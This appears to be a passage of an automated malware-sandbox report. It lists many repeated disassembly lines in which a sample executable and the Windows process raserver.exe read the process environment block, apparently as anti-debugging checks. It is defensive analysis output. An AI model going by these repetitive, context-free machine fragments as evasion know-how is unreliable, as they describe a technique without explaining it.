Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]	1_2_00992D8A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]	1_2_00992D8A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]	1_2_00992D8A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]	1_2_00992D8A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009C35A1 mov eax, dword ptr fs:[00000030h]	1_2_009C35A1
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A48DF1 mov eax, dword ptr fs:[00000030h]	1_2_00A48DF1
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A68D34 mov eax, dword ptr fs:[00000030h]	1_2_00A68D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]	1_2_009C4D3B
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]	1_2_009C4D3B
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]	1_2_009C4D3B
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099AD30 mov eax, dword ptr fs:[00000030h]	1_2_0099AD30
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]	1_2_009A3D34
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009B7D50 mov eax, dword ptr fs:[00000030h]	1_2_009B7D50
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D3D43 mov eax, dword ptr fs:[00000030h]	1_2_009D3D43
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A13540 mov eax, dword ptr fs:[00000030h]	1_2_00A13540
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]	1_2_009BC577
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]	1_2_009BC577
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]	1_2_00A60EA5
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]	1_2_00A60EA5
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]	1_2_00A60EA5
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A146A7 mov eax, dword ptr fs:[00000030h]	1_2_00A146A7
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A2FE87 mov eax, dword ptr fs:[00000030h]	1_2_00A2FE87
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009C36CC mov eax, dword ptr fs:[00000030h]	1_2_009C36CC
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A4FEC0 mov eax, dword ptr fs:[00000030h]	1_2_00A4FEC0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A68ED6 mov eax, dword ptr fs:[00000030h]	1_2_00A68ED6
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A76E2 mov eax, dword ptr fs:[00000030h]	1_2_009A76E2
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009C16E0 mov ecx, dword ptr fs:[00000030h]	1_2_009C16E0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]	1_2_0099C600
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]	1_2_0099C600
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]	1_2_0099C600
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A4FE3F mov eax, dword ptr fs:[00000030h]	1_2_00A4FE3F
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099E620 mov eax, dword ptr fs:[00000030h]	1_2_0099E620
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A766D mov eax, dword ptr fs:[00000030h]	1_2_009A766D
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]	1_2_00A6070D
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]	1_2_00A6070D
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CE730 mov eax, dword ptr fs:[00000030h]	1_2_009CE730
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]	1_2_00A2FF10
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]	1_2_00A2FF10
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]	1_2_00994F2E
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]	1_2_00994F2E
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A68F6A mov eax, dword ptr fs:[00000030h]	1_2_00A68F6A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009AEF40 mov eax, dword ptr fs:[00000030h]	1_2_009AEF40
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009AFF60 mov eax, dword ptr fs:[00000030h]	1_2_009AFF60
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFF0BF mov ecx, dword ptr fs:[00000030h]	9_2_04AFF0BF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFF0BF mov eax, dword ptr fs:[00000030h]	9_2_04AFF0BF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFF0BF mov eax, dword ptr fs:[00000030h]	9_2_04AFF0BF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B090AF mov eax, dword ptr fs:[00000030h]	9_2_04B090AF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC9080 mov eax, dword ptr fs:[00000030h]	9_2_04AC9080
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B43884 mov eax, dword ptr fs:[00000030h]	9_2_04B43884
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B43884 mov eax, dword ptr fs:[00000030h]	9_2_04B43884
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD849B mov eax, dword ptr fs:[00000030h]	9_2_04AD849B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B814FB mov eax, dword ptr fs:[00000030h]	9_2_04B814FB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B46CF0 mov eax, dword ptr fs:[00000030h]	9_2_04B46CF0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B46CF0 mov eax, dword ptr fs:[00000030h]	9_2_04B46CF0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B46CF0 mov eax, dword ptr fs:[00000030h]	9_2_04B46CF0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]	9_2_04B5B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B5B8D0 mov ecx, dword ptr fs:[00000030h]	9_2_04B5B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]	9_2_04B5B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]	9_2_04B5B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]	9_2_04B5B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]	9_2_04B5B8D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B98CD6 mov eax, dword ptr fs:[00000030h]	9_2_04B98CD6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF002D mov eax, dword ptr fs:[00000030h]	9_2_04AF002D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF002D mov eax, dword ptr fs:[00000030h]	9_2_04AF002D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF002D mov eax, dword ptr fs:[00000030h]	9_2_04AF002D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF002D mov eax, dword ptr fs:[00000030h]	9_2_04AF002D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF002D mov eax, dword ptr fs:[00000030h]	9_2_04AF002D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFBC2C mov eax, dword ptr fs:[00000030h]	9_2_04AFBC2C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADB02A mov eax, dword ptr fs:[00000030h]	9_2_04ADB02A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADB02A mov eax, dword ptr fs:[00000030h]	9_2_04ADB02A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADB02A mov eax, dword ptr fs:[00000030h]	9_2_04ADB02A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADB02A mov eax, dword ptr fs:[00000030h]	9_2_04ADB02A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B47016 mov eax, dword ptr fs:[00000030h]	9_2_04B47016
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B47016 mov eax, dword ptr fs:[00000030h]	9_2_04B47016
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B47016 mov eax, dword ptr fs:[00000030h]	9_2_04B47016
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B94015 mov eax, dword ptr fs:[00000030h]	9_2_04B94015
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B94015 mov eax, dword ptr fs:[00000030h]	9_2_04B94015
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B9740D mov eax, dword ptr fs:[00000030h]	9_2_04B9740D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B9740D mov eax, dword ptr fs:[00000030h]	9_2_04B9740D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B9740D mov eax, dword ptr fs:[00000030h]	9_2_04B9740D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81C06 mov eax, dword ptr fs:[00000030h]	9_2_04B81C06
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B46C0A mov eax, dword ptr fs:[00000030h]	9_2_04B46C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B46C0A mov eax, dword ptr fs:[00000030h]	9_2_04B46C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B46C0A mov eax, dword ptr fs:[00000030h]	9_2_04B46C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B46C0A mov eax, dword ptr fs:[00000030h]	9_2_04B46C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE746D mov eax, dword ptr fs:[00000030h]	9_2_04AE746D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B82073 mov eax, dword ptr fs:[00000030h]	9_2_04B82073
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B91074 mov eax, dword ptr fs:[00000030h]	9_2_04B91074
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFA44B mov eax, dword ptr fs:[00000030h]	9_2_04AFA44B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B5C450 mov eax, dword ptr fs:[00000030h]	9_2_04B5C450
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B5C450 mov eax, dword ptr fs:[00000030h]	9_2_04B5C450
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE0050 mov eax, dword ptr fs:[00000030h]	9_2_04AE0050
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE0050 mov eax, dword ptr fs:[00000030h]	9_2_04AE0050
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B451BE mov eax, dword ptr fs:[00000030h]	9_2_04B451BE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B451BE mov eax, dword ptr fs:[00000030h]	9_2_04B451BE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B451BE mov eax, dword ptr fs:[00000030h]	9_2_04B451BE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B451BE mov eax, dword ptr fs:[00000030h]	9_2_04B451BE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF35A1 mov eax, dword ptr fs:[00000030h]	9_2_04AF35A1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF61A0 mov eax, dword ptr fs:[00000030h]	9_2_04AF61A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF61A0 mov eax, dword ptr fs:[00000030h]	9_2_04AF61A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B469A6 mov eax, dword ptr fs:[00000030h]	9_2_04B469A6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]	9_2_04AF1DB5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]	9_2_04AF1DB5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]	9_2_04AF1DB5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC2D8A mov eax, dword ptr fs:[00000030h]	9_2_04AC2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC2D8A mov eax, dword ptr fs:[00000030h]	9_2_04AC2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC2D8A mov eax, dword ptr fs:[00000030h]	9_2_04AC2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC2D8A mov eax, dword ptr fs:[00000030h]	9_2_04AC2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC2D8A mov eax, dword ptr fs:[00000030h]	9_2_04AC2D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFA185 mov eax, dword ptr fs:[00000030h]	9_2_04AFA185
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AEC182 mov eax, dword ptr fs:[00000030h]	9_2_04AEC182
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFFD9B mov eax, dword ptr fs:[00000030h]	9_2_04AFFD9B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFFD9B mov eax, dword ptr fs:[00000030h]	9_2_04AFFD9B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF2990 mov eax, dword ptr fs:[00000030h]	9_2_04AF2990
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B78DF1 mov eax, dword ptr fs:[00000030h]	9_2_04B78DF1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]	9_2_04ACB1E1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]	9_2_04ACB1E1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]	9_2_04ACB1E1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]	9_2_04ADD5E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]	9_2_04ADD5E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B541E8 mov eax, dword ptr fs:[00000030h]	9_2_04B541E8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B4A537 mov eax, dword ptr fs:[00000030h]	9_2_04B4A537
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B98D34 mov eax, dword ptr fs:[00000030h]	9_2_04B98D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE4120 mov eax, dword ptr fs:[00000030h]	9_2_04AE4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE4120 mov eax, dword ptr fs:[00000030h]	9_2_04AE4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE4120 mov eax, dword ptr fs:[00000030h]	9_2_04AE4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE4120 mov eax, dword ptr fs:[00000030h]	9_2_04AE4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE4120 mov ecx, dword ptr fs:[00000030h]	9_2_04AE4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF4D3B mov eax, dword ptr fs:[00000030h]	9_2_04AF4D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF4D3B mov eax, dword ptr fs:[00000030h]	9_2_04AF4D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF4D3B mov eax, dword ptr fs:[00000030h]	9_2_04AF4D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF513A mov eax, dword ptr fs:[00000030h]	9_2_04AF513A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF513A mov eax, dword ptr fs:[00000030h]	9_2_04AF513A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD3D34 mov eax, dword ptr fs:[00000030h]	9_2_04AD3D34
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACAD30 mov eax, dword ptr fs:[00000030h]	9_2_04ACAD30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC9100 mov eax, dword ptr fs:[00000030h]	9_2_04AC9100
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC9100 mov eax, dword ptr fs:[00000030h]	9_2_04AC9100
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC9100 mov eax, dword ptr fs:[00000030h]	9_2_04AC9100
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACC962 mov eax, dword ptr fs:[00000030h]	9_2_04ACC962
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AEC577 mov eax, dword ptr fs:[00000030h]	9_2_04AEC577
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AEC577 mov eax, dword ptr fs:[00000030h]	9_2_04AEC577
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACB171 mov eax, dword ptr fs:[00000030h]	9_2_04ACB171
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACB171 mov eax, dword ptr fs:[00000030h]	9_2_04ACB171
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AEB944 mov eax, dword ptr fs:[00000030h]	9_2_04AEB944
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AEB944 mov eax, dword ptr fs:[00000030h]	9_2_04AEB944
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B03D43 mov eax, dword ptr fs:[00000030h]	9_2_04B03D43
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B43540 mov eax, dword ptr fs:[00000030h]	9_2_04B43540
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE7D50 mov eax, dword ptr fs:[00000030h]	9_2_04AE7D50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC52A5 mov eax, dword ptr fs:[00000030h]	9_2_04AC52A5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC52A5 mov eax, dword ptr fs:[00000030h]	9_2_04AC52A5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC52A5 mov eax, dword ptr fs:[00000030h]	9_2_04AC52A5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC52A5 mov eax, dword ptr fs:[00000030h]	9_2_04AC52A5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC52A5 mov eax, dword ptr fs:[00000030h]	9_2_04AC52A5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B446A7 mov eax, dword ptr fs:[00000030h]	9_2_04B446A7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B90EA5 mov eax, dword ptr fs:[00000030h]	9_2_04B90EA5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B90EA5 mov eax, dword ptr fs:[00000030h]	9_2_04B90EA5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B90EA5 mov eax, dword ptr fs:[00000030h]	9_2_04B90EA5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]	9_2_04ADAAB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]	9_2_04ADAAB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFFAB0 mov eax, dword ptr fs:[00000030h]	9_2_04AFFAB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B5FE87 mov eax, dword ptr fs:[00000030h]	9_2_04B5FE87
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFD294 mov eax, dword ptr fs:[00000030h]	9_2_04AFD294
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFD294 mov eax, dword ptr fs:[00000030h]	9_2_04AFD294
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF2AE4 mov eax, dword ptr fs:[00000030h]	9_2_04AF2AE4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF16E0 mov ecx, dword ptr fs:[00000030h]	9_2_04AF16E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD76E2 mov eax, dword ptr fs:[00000030h]	9_2_04AD76E2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF36CC mov eax, dword ptr fs:[00000030h]	9_2_04AF36CC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AF2ACB mov eax, dword ptr fs:[00000030h]	9_2_04AF2ACB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B98ED6 mov eax, dword ptr fs:[00000030h]	9_2_04B98ED6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B7FEC0 mov eax, dword ptr fs:[00000030h]	9_2_04B7FEC0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B08EC7 mov eax, dword ptr fs:[00000030h]	9_2_04B08EC7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B7FE3F mov eax, dword ptr fs:[00000030h]	9_2_04B7FE3F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACE620 mov eax, dword ptr fs:[00000030h]	9_2_04ACE620
